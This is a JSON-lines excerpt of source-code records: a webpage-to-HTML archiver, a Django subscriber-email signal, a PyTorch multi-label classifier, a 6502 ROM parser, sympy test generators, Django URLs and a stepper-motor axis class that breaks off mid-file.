referer_url=referer_url)\n if type(js_str) == bytes:\n js_str = js_str.decode('utf-8')\n try:\n if js_str.find('') > -1:\n code['src'] = 'data:text/javascript;base64,' + base64.b64encode(js_str.encode()).decode()\n elif js_str.find(']]>') < 0:\n code.string = ''\n else:\n # replace ]]> does not work at all for chrome, do not believe\n # http://en.wikipedia.org/wiki/CDATA\n # code.string = '', ']]]]>') + '\\n]]>'\n code.string = js_str\n except Exception as ex:\n if verbose:\n log(f\"[ERROR]\\t{repr(js_str)}: {ex}\")\n raise\n js.replace_with(code)\n\n # iframe の内容を取得\n for i_frame in soup(\"iframe\"):\n if i_frame.get('src'):\n log(f\"[ DEBUG ] found iframe {i_frame['src']}\")\n # log(absurl(url, i_frame['src']))\n i_frame['data-src'] = i_frame['src']\n if level <= 1:\n i_frame_html = generate(i_frame['src'], level=level + 1, referer_url=referer_url)\n add_links(absurl(url, i_frame['data-src']))\n else:\n i_frame_html = \"\" \\\n \"\" \\\n \"Grandchild title\" \\\n \"\"\n i_frame['src'] = 'data:text/html;base64,' + base64.b64encode(i_frame_html.encode()).decode()\n\n # iframe の内容を取得\n for frame in soup(\"frame\"):\n if frame.get('src'):\n log(f\"[ DEBUG ] found frames {frame['src']}\")\n frame['data-src'] = frame['src']\n if level <= 1:\n frame_html = generate(frame['src'], level=level + 1, referer_url=referer_url)\n add_links(absurl(url, frame['data-src']))\n else:\n frame_html = \"\" \\\n \"Grandchild title\" \\\n \"\"\n frame['src'] = 'data:text/html;base64,' + base64.b64encode(frame_html.encode()).decode()\n for img in soup('img'):\n if not img.get('src'):\n continue\n img['data-src'] = img['src']\n img['src'] = data_to_base64(url, img['src'], verbose=verbose)\n\n # `img` elements may have `srcset` attributes with multiple sets of images.\n # To get a lighter document it will be cleared, and used only the standard `src` attribute\n # Maybe add a flag to enable the base64 conversion of each `srcset`?\n # For now a simple warning is displayed informing that image has multiple sources\n # that are stripped.\n\n if img.get('srcset'):\n img['data-srcset'] = img['srcset']\n del img['srcset']\n if verbose:\n log(f\"[ WARN ] srcset found in img tag. Attribute will be cleared. File src => {img['data-src']}\")\n\n def check_alt(attr):\n if img.has_attr(attr) and img[attr].startswith('this.src='):\n # we do not handle this situation yet, just warn the user\n if verbose:\n log(f'[ WARN ] {attr} found in img tag and unhandled, which may break page')\n\n check_alt('onerror')\n check_alt('onmouseover')\n check_alt('onmouseout')\n\n for tag in soup(True):\n # HTMLの文字コードにUTF-8を設定する\n if tag.name == \"meta\" and tag.has_attr('charset') and tag['charset'].lower() != \"uft-8\":\n tag[\"charset\"] = \"UTF-8\"\n elif tag.name == \"meta\" and tag.has_attr('http-equiv') and tag['http-equiv'].lower() == \"content-type\" \\\n and tag.has_attr('content'):\n tag[\"content\"] = \"text/html; charset=UTF-8\"\n\n # リンクを抜き出し\n if full_url and tag.name == 'a' and tag.has_attr('href') and not tag['href'].startswith('#'):\n tag['data-href'] = tag['href']\n tag['href'] = absurl(url, tag['href'])\n add_links(tag['href'])\n\n # スタイルシートを抜き出し\n if tag.has_attr('style'):\n if tag['style']:\n tag['style'] = handle_css_content(url, tag['style'], verbose=verbose)\n elif tag.name == 'link' and tag.has_attr('type') and tag['type'] == 'text/css':\n if tag.string:\n tag.string = handle_css_content(url, tag.string, verbose=verbose)\n elif tag.name == 'style':\n if tag.string:\n tag.string = handle_css_content(url, tag.string, verbose=verbose)\n\n # 出力データの生成\n result = soup.prettify(formatter='html5')\n\n # MIME image/jpeg が image/jpg になるので置換する\n result = result.replace(\"url(data:image/jpg;base64,\", \"url(data:image/jpeg;base64,\")\n\n # CSS の URL(STR) をクオートで囲む\n result = re.sub(r'url\\s*\\((data:.+?)\\)', r'url(\"\\1\")', result)\n\n if level > 1:\n return soup.prettify(formatter='html5')\n else:\n html_file_path = f\"{download_dir}/html/{site_id}_{getting_time}.html\"\n with open(html_file_path, 'w') as f:\n f.write(result)\n\n save_links()\n save_url_id_list()\n\n\ndef save_links():\n global external_links\n global internal_links\n global base_url\n global getting_time\n\n links = [base_url]\n internal_links.sort()\n for url in sorted(set(internal_links)):\n if url not in links:\n links.append(url)\n for url in sorted(set(external_links)):\n if url not in links:\n links.append(url)\n\n link_file_path = f\"{download_dir}/link/{site_id}_{getting_time}.txt\"\n with open(link_file_path, 'w') as f:\n f.write(\"\\n\".join(links))\n\n\ndef save_url_id_list():\n global site_id\n global base_url\n global getting_time\n\n link_file_path = f\"{download_dir}/url_id_list.txt\"\n text = f\"{site_id}\\t{base_url}\\t{getting_time}\\n\"\n with open(link_file_path, 'a') as f:\n f.write(text)\n\n\ndef check_within_one_day(url):\n global download_dir\n global site_id\n site_id = make_site_id(url)\n files = Path(download_dir).glob(f\"**/{site_id}_*JST.*\")\n now = datetime.now(timezone(timedelta(hours=+9), 'JST'))\n for file in files:\n m = re.search(r'(\\d{8}T\\d{6}JST)\\.(.+)$', str(file))\n if m:\n get_time = datetime.strptime(f\"{m.group(1)}\".replace(\"JST\", '+0900'), '%Y%m%dT%H%M%S%z')\n td = now - get_time\n if td.days < 1:\n return True\n else:\n continue\n return False\n\ndef short_cut(url):\n global getting_time\n\n # 24時間以内に取得していたらパスする.\n if check_within_one_day(url):\n print(\"24時間以内に取得したデータがあります.\")\n return False\n\n generate(url)\n\n\ndef main():\n fire.Fire(short_cut)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"webpage2html/webpage2html.py","file_name":"webpage2html.py","file_ext":"py","file_size_in_byte":26065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"324234698","text":"import os\n\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\n\nfrom blog.models import Post\nfrom subscription.models import Subscription\n\n\n@receiver(post_save, sender=Post)\ndef send_email(sender, instance, **kwargs):\n # Get emails of subscribed users\n sub_emails = User.objects.filter(pk__in=Subscription.objects\n .filter(publisher__exact=instance.author)\n .values_list('subscriber_id')).values_list('email', flat=True)\n\n subject = 'New post | Django Boys Blog'\n text = '

Check new post by ' + instance.author.username + '

' + instance.title + ''\n message = Mail(\n from_email='info@djangoboysblog.com',\n subject=subject,\n html_content=text)\n # Add emails\n for to_email in sub_emails:\n message.add_to(to_email)\n try:\n sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\n except Exception as e:\n print(e.message)\n\n pass\n","sub_path":"blog/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"219633915","text":"import sys\nfrom torchvision import transforms\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\nimport dataset_processing\nimport torch.optim as optim\nfrom torch.autograd import Variable\nimport torch\n\nclass MultiLabelNN(nn.Module):\n def __init__(self, nlabel):\n super(MultiLabelNN, self).__init__()\n self.nlabel = nlabel\n self.conv1 = nn.Conv2d(3, 6, 5)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(6, 16, 5)\n self.fc1 = nn.Linear(179776, 1024)\n self.fc2 = nn.Linear(1024, nlabel)\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.pool(x)\n x = self.conv2(x)\n x = F.relu(x)\n # x = self.pool(x)\n x = x.view(-1, 179776)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n return x\n\n\ndef main():\n \"\"\"Main Function\"\"\"\n DATA_PATH = 'data_original_named' # data_5classes\n TRAIN_DATA = 'train_img'\n TEST_DATA = 'test_img'\n\n # These are the actual strings the processing function should\n # look for in the filenames, in Ordner to create the target labels.\n #search_classes = [\"cat\", \"dog\", \"desert\", \"mountain\", \"sunset\"] \n search_classes = [\"desert\", \"mountains\", \"sea\", \"sunset\", \"trees\"] \n\n NLABELS = len(search_classes)\n batch_size = 16\n #kwargs = {} # für CPU\n #kwargs = {'num_workers': 1, 'pin_memory': True} # für GPU/CUDA\n\n transformations = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor()])\n\n\n dset_train = dataset_processing.DatasetProcessing(\n DATA_PATH,\n TRAIN_DATA,\n #TRAIN_IMG_FILE,\n #TRAIN_LABEL_FILE,\n search_classes,\n transformations\n )\n\n dset_test = dataset_processing.DatasetProcessing(\n DATA_PATH,\n TEST_DATA,\n #TEST_IMG_FILE,\n #TEST_LABEL_FILE,\n search_classes,\n transformations\n )\n\n train_loader = DataLoader(dset_train,\n batch_size=batch_size,\n shuffle=True,\n num_workers=4\n )\n\n test_loader = DataLoader(dset_test,\n batch_size=batch_size,\n shuffle=False,\n num_workers=4\n )\n\n\n use_gpu = torch.cuda.is_available()\n print(\"CUDA?: \", use_gpu)\n model = MultiLabelNN(NLABELS)\n if use_gpu:\n model = model.cuda()\n\n optimizer = optim.SGD(model.parameters(), lr=0.00001)\n criterion = nn.MultiLabelMarginLoss()\n\n epochs = 30\n for epoch in range(epochs):\n ### training phase\n #total_training_loss = 0.0\n # total = 0.0\n for iter, traindata in enumerate(train_loader, 0):\n train_inputs, train_labels = traindata\n if use_gpu:\n train_inputs, train_labels = Variable(train_inputs.cuda()), Variable(train_labels.cuda())\n else: train_inputs, train_labels = Variable(train_inputs), Variable(train_labels)\n\n optimizer.zero_grad()\n train_outputs = model(train_inputs)\n #print(\"Train Output is:\", train_outputs)\n #print(\"Train Labels is:\", train_labels)\n loss = criterion(train_outputs, train_labels)\n loss.backward()\n optimizer.step()\n\n # total += train_labels.size(0)\n #total_training_loss += loss.data[0]\n print('Training Phase: Epoch: [%2d][%2d/%2d]\\tIteration Loss: %.3f' %\n (iter, epoch, epochs, loss.data[0] / train_labels.size(0)))\n \n ### testing phase\n for iter, testdata in enumerate(test_loader, 0):\n test_inputs, test_labels = testdata\n if use_gpu:\n test_inputs, test_labels = Variable(test_inputs.cuda()), Variable(test_labels.cuda())\n else: test_inputs, test_labels = Variable(test_inputs), Variable(test_labels)\n\n test_outputs = model(test_inputs)\n test_loss = criterion(test_outputs, test_labels)\n print('Testing Phase: Epoch: [%2d][%2d/%2d]\\tIteration Loss: %.3f' %\n (iter, epoch, epochs, test_loss.data[0] / test_labels.size(0)))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"multi_label_classifier.py","file_name":"multi_label_classifier.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"141987608","text":"#\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2019 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# SPDX-License-Identifier: EPL-2.0\n#\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom common.base_model_init import BaseModelInitializer\nfrom common.base_model_init import set_env_var\n\nimport os\n\n\nclass ModelInitializer(BaseModelInitializer):\n \"\"\"initialize model and run benchmark\"\"\"\n\n def __init__(self, args, custom_args=[], platform_util=None):\n super(ModelInitializer, self).__init__(args, custom_args, platform_util)\n\n # set num_inter_threads and num_intra_threads\n self.set_num_inter_intra_threads()\n\n # Set KMP env vars, if they haven't already been set\n self.set_kmp_vars(kmp_affinity=\"granularity=fine, compact, 1, 0\")\n set_env_var(\"KMP_HW_SUBSET\", \"1T\")\n\n benchmark_script = os.path.join(\n self.args.intelai_models, \"coco.py\")\n self.benchmark_command = self.get_numactl_command(args.socket_id) + \\\n self.python_exe + \" \" + benchmark_script + \" evaluate \"\n\n set_env_var(\"OMP_NUM_THREADS\", self.args.num_intra_threads)\n\n self.benchmark_command = self.benchmark_command + \\\n \" --dataset=\" + str(self.args.data_location) + \\\n \" --num_inter_threads \" + str(self.args.num_inter_threads) + \\\n \" --num_intra_threads \" + str(self.args.num_intra_threads) + \\\n \" --nw 5 --nb 50 --model=coco\" + \\\n \" --infbs \" + str(self.args.batch_size)\n\n def run(self):\n if self.benchmark_command:\n self.run_command(self.benchmark_command)\n","sub_path":"benchmarks/image_segmentation/tensorflow/maskrcnn/inference/fp32/model_init.py","file_name":"model_init.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"216924759","text":"from da65tracelib.label import Label\nfrom da65tracelib.mark import MarkType\nfrom da65tracelib.opcodes import JMP_ABS\nfrom da65tracelib.trace_info import TraceInfo\nfrom da65tracelib.utils import isprintable\nfrom itertools import takewhile\n\n#from mark import MarkType\n#from trace_error import TraceError\n\nROM_LOAD_ADDRESS = 0x8000\n\nROM_TYPE_FLAG_SERVICE = \"service\"\nROM_TYPE_FLAG_HAS_RELOCATION_ADDRESS = \"has_relocation_address\"\nROM_TYPE_FLAGS = {\n ROM_TYPE_FLAG_SERVICE: 0b10000000,\n \"language\": 0b01000000,\n ROM_TYPE_FLAG_HAS_RELOCATION_ADDRESS: 0b00100000,\n \"supports_firm_keys\": 0b00010000\n}\n\nROM_TYPE_ARCHITECTURE_6502_CODE = \"6502_code\"\nROM_TYPE_ARCHITECTURES = {\n \"6502_basic_rom_code\": 0b0000,\n \"reserved0\": 0b0001,\n ROM_TYPE_ARCHITECTURE_6502_CODE: 0b0010,\n \"68000_code\": 0b0011,\n \"z80_code\": 0b1000,\n \"32016_code\": 0b1001,\n \"reserved1\": 0b1010,\n \"80186_code\": 0b1011,\n \"80286_code\": 0b1100,\n \"arm_code\": 0b1101\n}\n\ndef read_int(e, byte_count):\n value = 0\n offset = None\n for i in range(0, byte_count):\n next_offset, temp = e.next()\n if offset is None:\n offset = next_offset\n\n value += (temp << (i * 8))\n return offset, value\n\ndef read_byte(e): return read_int(e, 1)\n\ndef read_word(e): return read_int(e, 2)\n\ndef read_dword(e): return read_int(e, 4)\n\ndef read_metadata_jump(trace_info, e, name):\n offset, opcode = e.next()\n _, jump_address = read_word(e)\n if opcode == JMP_ABS:\n trace_info.entry_points.append(jump_address)\n trace_info.labels.append(Label(name, jump_address))\n trace_info.mark_range(offset, 3, MarkType.code)\n else:\n trace_info.mark_range(offset, 3, MarkType.data)\n return jump_address\n\ndef read_metadata_string(trace_info, e, name):\n def translate_str(data):\n return \"\".join(map(lambda x: chr(x) if isprintable(x) else \".\", data))\n\n items = list(takewhile(lambda x: x[1] != 0, e))\n offset, value = items[0]\n trace_info.labels.append(Label(name, ROM_LOAD_ADDRESS + offset, len(items) + 1))\n trace_info.mark_range(offset, len(items) + 1, MarkType.text)\n value = translate_str([item[1] for item in items])\n return value\n\ndef read_metadata_byte(trace_info, e, name, convert_value=None, format_comment=None):\n offset, value = read_byte(e)\n value = value if convert_value is None else convert_value(value)\n comment = None if format_comment is None else (format_comment(value) if callable(format_comment) else format_comment)\n trace_info.labels.append(Label(name, ROM_LOAD_ADDRESS + offset, None, comment))\n return value\n\ndef read_metadata_dword(trace_info, e, name, convert_value=None, format_comment=None):\n offset, value = read_dword(e)\n value = value if convert_value is None else convert_value(value)\n comment = None if format_comment is None else (format_comment(value) if callable(format_comment) else format_comment)\n trace_info.labels.append(Label(name, ROM_LOAD_ADDRESS + offset, None, comment))\n return value\n\ndef translate_rom_type_flags(value):\n flags = []\n for key in ROM_TYPE_FLAGS:\n mask = ROM_TYPE_FLAGS[key]\n if (value & mask) != 0:\n flags.append(key)\n\n architecture = value & 0b1111\n for key in ROM_TYPE_ARCHITECTURES:\n mask = ROM_TYPE_ARCHITECTURES[key]\n if architecture == mask:\n flags.append(key)\n break\n\n return flags\n\ndef add_common_labels(trace_info):\n labels = [\n (\"OSRDRM\", 0xFFB9, None),\n (\"OSEVEN\", 0xFFBF, None),\n (\"GSINIT\", 0xFFC2, None),\n (\"GSREAD\", 0xFFC5, None),\n (\"OSFIND\", 0xFFCE, None),\n (\"OSGBPB\", 0xFFD1, None),\n (\"OSBPUT\", 0xFFD4, None),\n (\"OSBGET\", 0xFFD7, None),\n (\"OSARGS\", 0xFFDA, None),\n (\"OSFILE\", 0xFFDD, None),\n (\"OSRDCH\", 0xFFE0, None),\n (\"OSASCI\", 0xFFE3, None),\n (\"OSNEWL\", 0xFFE7, None),\n (\"OSWRCH\", 0xFFEE, None),\n (\"OSWORD\", 0xFFF1, None),\n (\"OSBYTE\", 0xFFF4, None),\n (\"OSCLI\", 0xFFF7, None),\n (\"ACORN_MOS\", 0xFF00, None),\n (\"FRED\", 0xFC00, 0x00FF),\n (\"JIM\", 0xFD00, 0x00FF),\n (\"SHEILA\", 0xFE00, 0x00FF)\n ]\n for name, address, count in labels:\n trace_info.labels.append(Label(name, address, count))\n\ndef sideways_rom(data):\n trace_info = TraceInfo(ROM_LOAD_ADDRESS, data)\n\n add_common_labels(trace_info)\n\n e = enumerate(data)\n\n # Language entry point\n read_metadata_jump(trace_info, e, \"language_entry_point\")\n\n # Service entry point\n read_metadata_jump(trace_info, e, \"service_entry_point\")\n\n # ROM type\n rom_type_flags = read_metadata_byte( \\\n trace_info, \\\n e, \\\n \"rom_type_flags\", \\\n translate_rom_type_flags, \\\n lambda x: \"rom_type_flags: {0}\".format(\", \".join(x)))\n if ROM_TYPE_ARCHITECTURE_6502_CODE not in rom_type_flags:\n raise TraceError(\"Unsupported ROM architecture {0}\".format(rom_type_flags))\n if ROM_TYPE_FLAG_SERVICE not in rom_type_flags:\n raise TraceError(\"Must have a service entry point\")\n\n # Copyright offset\n read_metadata_byte( \\\n trace_info, \\\n e, \\\n \"copyright_offset\", \\\n None, \\\n \".LOBYTE(copyright_string - 1)\")\n\n # Binary version\n read_metadata_byte(trace_info, e, \"binary_version\")\n\n # Title string\n read_metadata_string(trace_info, e, \"title_string\")\n\n # Version string\n read_metadata_string(trace_info, e, \"version_string\")\n\n # Copyright string\n read_metadata_string(trace_info, e, \"copyright_string\")\n\n # Tube relocation address\n if ROM_TYPE_FLAG_HAS_RELOCATION_ADDRESS in rom_type_flags:\n read_metadata_dword(trace_info, e, \"relocation_address\")\n\n return trace_info\n\n","sub_path":"da65trace/parsers/acorn.py","file_name":"acorn.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"153191113","text":"from functools import partial\n\nfrom nose.plugins.attrib import attr\n\nfrom nosedata import solve_generic, solve_9, dsolve_generic, solve_10, solve_10_trig, solve_10_hangs, limit_func, \\\n limit_data, \\\n diff_data, diff_func, integrate_data, integrate_func, solve_basecamp, solve_9_hangs, logsolve, absolve, varsolve\nfrom sympy import solve, simplify\nfrom nosedata import dsolve_func\n\n\n@attr(version='master', dataset='solve')\ndef test_solve_master_gen():\n for t in test_gen_master('solve', solve_generic, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve')\ndef test_solve_moriarty_gen():\n for t in test_gen_moriarty('solve', solve_generic, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='solve-9')\ndef test_solve_9_master_gen():\n for t in test_gen_master('solve-9', solve_9, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-9')\ndef test_solve_9_moriarty_gen():\n for t in test_gen_moriarty('solve-9', solve_9, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-9-hangs')\ndef test_solve_9_moriarty_genh():\n for t in test_gen_moriarty('solve-9-hangs', solve_9_hangs, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-10-hangs')\ndef test_solve_10_moriarty_genh():\n for t in test_gen_moriarty('solve-10-hangs', solve_10_hangs, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-9-hangs')\ndef test_solve_9_moriarty_genh():\n for t in test_gen_moriarty('solve-9-hangs', solve_9_hangs, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='solve-9-hangs')\ndef test_solve_9_master_genh():\n for t in test_gen_master('solve-9-hangs', solve_9_hangs, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-10-hangs')\ndef test_solve_10_moriarty_genh():\n for t in test_gen_moriarty('solve-10-hangs', solve_10_hangs, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='solve-10-hangs')\ndef test_solve_10_master_genh():\n for t in test_gen_master('solve-10-hangs', solve_10_hangs, partial(check_master, solve)):\n yield t\n\n\n@attr(version='master', dataset='solve-10')\ndef test_solve_10_master_gen():\n for t in test_gen_master('solve-10', solve_10, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-10')\ndef test_solve_10_moriarty_gen():\n for t in test_gen_moriarty('solve-10', solve_10 + solve_10_trig, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='dsolve')\ndef test_dsolve_master_gen():\n for t in test_gen_master('dsolve', dsolve_generic, partial(check_master, dsolve_func)):\n yield t\n\n\n@attr(version='moriarty', dataset='dsolve')\ndef test_dsolve_moriarty_gen():\n for t in test_gen_moriarty('dsolve', dsolve_generic, partial(check_moriarty, dsolve_func)):\n yield t\n\n\n@attr(version='master', dataset='limit')\ndef test_limit_master_gen():\n for t in test_gen_master('limit', limit_data, partial(check_master, limit_func)):\n yield t\n\n\n@attr(version='moriarty', dataset='limit')\ndef test_limit_moriarty_gen():\n for t in test_gen_moriarty('limit', limit_data, partial(check_moriarty, limit_func)):\n yield t\n\n\n@attr(version='master', dataset='diff')\ndef test_diff_master_gen():\n for t in test_gen_master('diff', diff_data, partial(check_master, diff_func)):\n yield t\n\n\n@attr(version='moriarty', dataset='diff')\ndef test_diff_moriarty_gen():\n for t in test_gen_moriarty('diff', diff_data, partial(check_moriarty, diff_func)):\n yield t\n\n\n@attr(version='master', dataset='integrate')\ndef test_integrate_master_gen():\n for t in test_gen_master('integrate', integrate_data, partial(check_master, integrate_func)):\n yield t\n\n\n@attr(version='moriarty', dataset='integrate')\ndef test_integrate_moriarty_gen():\n for t in test_gen_moriarty('integrate', integrate_data, partial(check_moriarty, integrate_func)):\n yield t\n\n\ndef test_gen_master(name, test_data, check_func):\n header = 'equation,expected,master,status'\n for t in test_gen('nose-{}-master.log'.format(name), header, test_data, check_func):\n yield t\n\n\ndef test_gen_moriarty(name, test_data, check_func):\n header = 'equation,expected,moriarty,status,length'\n for t in test_gen('nose-{}-moriarty.log'.format(name), header, test_data, check_func):\n yield t\n\n\n@attr(version='master', dataset='solve_basecamp')\ndef test_basecamp_solve_master_gen():\n for t in test_gen_master('solve_basecamp', solve_basecamp, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve_basecamp')\ndef test_basecamp_solve_moriarty_gen():\n for t in test_gen_moriarty('solve_basecamp', solve_basecamp, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='logsolve')\ndef test_logsolve_master_gen():\n for t in test_gen_master('logsolve', logsolve, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='logsolve')\ndef test_logsolve_moriarty_gen():\n for t in test_gen_moriarty('logsolve', logsolve, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='absolve')\ndef test_absolve_master_gen():\n for t in test_gen_master('absolve', absolve, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='absolve')\ndef test_absolve_moriarty_gen():\n for t in test_gen_moriarty('absolve', absolve, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='varsolve')\ndef test_varsolve_master_gen():\n for t in test_gen_master('varsolve', varsolve, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='varsolve')\ndef test_varsolve_moriarty_gen():\n for t in test_gen_moriarty('varsolve', varsolve, partial(check_moriarty, solve)):\n yield t\n\n\ndef test_gen(log_name, log_header, test_data, check_func):\n with open(log_name, 'w') as f:\n f.write(log_header + '\\n')\n\n for input, expected_answer in test_data:\n yield check_func, input, expected_answer, log_name\n\n\ndef check_master(func, input, expected_answer, log_name):\n answer = None\n status = 'Failed'\n try:\n answer = func(input)\n assert_matches(expected_answer, answer)\n status = 'Passed'\n except Exception as e:\n if answer is None:\n answer = \"{}: {}\".format(e.__class__.__name__, e.message)\n raise\n finally:\n with open(log_name, 'a') as f:\n f.write('\"{}\",\"{}\",\"{}\",{}\\n'.format(input, expected_answer, answer, status))\n\n\ndef check_moriarty(func, input, expected_answer, log_name):\n from sympy.utilities.solution import last_solution, reset_solution\n\n reset_solution()\n answer = None\n status = 'Failed'\n try:\n answer = func(input)\n assert_matches(expected_answer, answer)\n status = 'Passed'\n except Exception as e:\n if answer is None:\n answer = \"{}: {}\".format(e.__class__.__name__, e.message)\n raise\n finally:\n number_of_steps = len([s for s in last_solution() if s.startswith('_')])\n with open(log_name, 'a') as f:\n f.write('\"{}\",\"{}\",\"{}\",{},{}\\n'.format(input, answer_to_str(expected_answer), answer_to_str(answer),\n status, number_of_steps))\n\n\ndef assert_matches(expected, actual):\n if hasattr(expected, 'is_number') and expected.is_number:\n assert simplify(expected - actual) == 0\n return\n if hasattr(expected, 'dummy_eq'):\n assert expected.dummy_eq(actual)\n return\n try:\n assert expected == actual\n except AssertionError:\n if isinstance(expected, list):\n assert len(expected) == len(actual)\n for e, a in zip(expected, actual):\n assert_matches(e, a)\n elif isinstance(expected, dict):\n assert expected.keys() == actual.keys()\n for k in expected.keys():\n assert_matches(expected[k], actual[k])\n else:\n raise\n\n\ndef answer_to_str(answer):\n \"\"\"\n This hack is not needed for sympy master\n \"\"\"\n if isinstance(answer, list):\n return '[' + ', '.join(answer_to_str(a) for a in answer) + ']'\n elif isinstance(answer, dict):\n return '{' + ', '.join(str(k) + ': ' + answer_to_str(v) for k, v in answer.items()) + '}'\n else:\n return str(answer)\n","sub_path":"tests/nose-tests.py","file_name":"nose-tests.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"593682104","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom .views import *\nfrom django.contrib.auth.views import logout\nfrom django.contrib import admin\nfrom django.conf import settings\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'pis_website.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^pis_admin/student/csv_student/$', csv_student),\n url(r'^pis_admin/student/csv_financial/$', csv_financial),\n url(r'^pis_admin/student/csv_grades/$', csv_grades),\n url(r'^pis_admin/', include(admin.site.urls)),\n url(r'^$', index),\n url(r'news/$', news),\n url(r'events/$', events),\n url(r'news_view_more/$', news_limit),\n url(r'real_monitoring/$', real_monitoring),\n url(r'news_view_more_event/$', news_limit_events),\n url(r'^events/', include('events.urls')),\n url(r'^employee/', include('employee.urls')),\n url(r'^student/', include('student.urls')), \n url(r'^contact/', include('contact.urls')), \n\n)\nurlpatterns += patterns(\n 'django.views.static',\n (r'media/(?P.*)',\n 'serve',\n {'document_root': settings.MEDIA_ROOT}), )\n","sub_path":"pis_website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"653830524","text":"import logging\n\nfrom ergaleia.import_by_path import import_by_path\n\nlog = logging.getLogger(__name__)\n\n\nHANDLERS = dict()\n\n\ndef add_event_handler(name, path):\n HANDLERS[name] = (path, import_by_path(path))\n\n\ndef dispatch(event):\n try:\n path, fn = HANDLERS[event.name]\n except KeyError:\n log.error(\"handler for event '{}' not defined\".format(event.name))\n raise\n else:\n log.info(\"dispatching event '{}' to {}\".format(event.name, path))\n fn(*event.args, **event.kwargs)\n","sub_path":"sqs_event/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"446468581","text":"#!/usr/bin/python\n'''\nCreated on Dec 18, 2017\n\n@author: blake pritchard\n'''\n\nimport os\nimport sys\nimport time\nimport logging\n\n# Import ADC (MCP3208) library.\nfrom mcp3208 import MCP3208\n\n# Import Stepper\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor, Adafruit_StepperMotor\n\n\nclass RotationalAxis(object):\n\n _is_busy = False\n _adc = 0\n _stepper = 0\n _axis_name = \"AxisNameHere\"\n\n _encoderposition_center = 0\n _encoderposition_min = 0\n _encoderposition_max = 0\n\n _steppercount_center = 0\n _steppercount_min = 0\n _steppercount_max = 0\n\n _target_degrees = 0\n _stepper_count = 0\n _steps_per_degree = 2\n _degrees_per_step = 0.5\n\n _requires_calibration = True\n _reverse_movement = False\n\n def __init__(self, axis_name, stepper, steps_per_degree, adc, adc_channel, stepper_center, stepper_min, stepper_max, encoder_center, encoder_min, encoder_max):\n self._axis_name = axis_name\n self._stepper = stepper\n self._steps_per_degree = steps_per_degree\n self._degrees_per_step = float(1.0)/self._steps_per_degree\n self._adc = adc\n self._adc_channel = adc_channel\n \n self._steppercount_center = stepper_center\n self._steppercount_min = stepper_min\n self._steppercount_max = stepper_max\n\n self._encoderposition_center = encoder_center\n self._encoderposition_min = encoder_min\n self._encoderposition_max = encoder_max\n\n def __del__(self):\n # body of destructor\n self._stepper = 0 